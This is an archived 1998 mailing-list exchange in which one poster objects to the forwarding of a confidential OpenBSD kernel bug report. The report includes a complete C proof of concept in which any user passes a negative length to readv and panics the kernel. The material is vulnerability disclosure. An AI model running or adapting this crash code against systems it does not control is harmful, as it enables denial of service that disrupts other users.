Since this bug is explicitly marked confidential, and was only opened today,
would it not have been reasonable to delay forwarding this. Given that the
OpenBSD people are particularly enthusiastic about security auditing, I expect
it will be fixed quickly.
David Maxwell
On Mon, Jul 27, 1998 at 11:23:59AM -0600, Michael Fuhr wrote:
> -----Forwarded message from jonat_private-----
>
> Message-Id: <199807271126.MAA16724at_private>
> Date: Mon, 27 Jul 1998 12:26:36 +0100 (BST)
> From: jonat_private
> To: gnatsat_private
> X-Send-Pr-Version: 3.97
> Subject: kernel/549: Any user can panic OpenBSD machine
> Sender: owner-bugsat_private
>
>
> >Number: 549
> >Category: kernel
> >Synopsis: readv with -ve block size panics kernel
> >Confidential: yes
> >Severity: critical
> >Priority: high
> >Responsible: bugs
> >State: open
> >Class: sw-bug
> >Submitter-Id: net
> >Arrival-Date: Mon Jul 27 05:40:02 MDT 1998
> >Last-Modified:
> >Originator: Jon Ribbens
> >Organization:
> \/ Jon Ribbens / jonat_private
> >Release: 2.3
> >Environment:
>
> System : OpenBSD 2.3
> Architecture: OpenBSD.i386
> Machine : i386
> >Description:
> readv with one of the blocks having a -ve size panics the kernel.
> Oops.
>
> >How-To-Repeat:
>
> #include <sys/types.h>
> #include <sys/uio.h>
> #include <unistd.h>
>
> int main(void) {
> struct iovec iov[1];
> char buffer[1024];
>
> iov[0].iov_base = buffer;
> iov[0].iov_len = -1;
>
> return readv(0, iov, 1);
> }
>
> run the above program, type a few characters, press return, observe
> either kernel panic or machine hang. panic message is
> "panic: ureadc: non-positive resid". Any user can do this.
>
>
> >Fix:
> Dunno I'm afraid.
>
>
> >Audit-Trail:
> >Unformatted:
>
> -----End of forwarded message-----
>
> --
> Michael Fuhr
> http://www.fuhr.net/~mfuhr/
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:08:28 PDT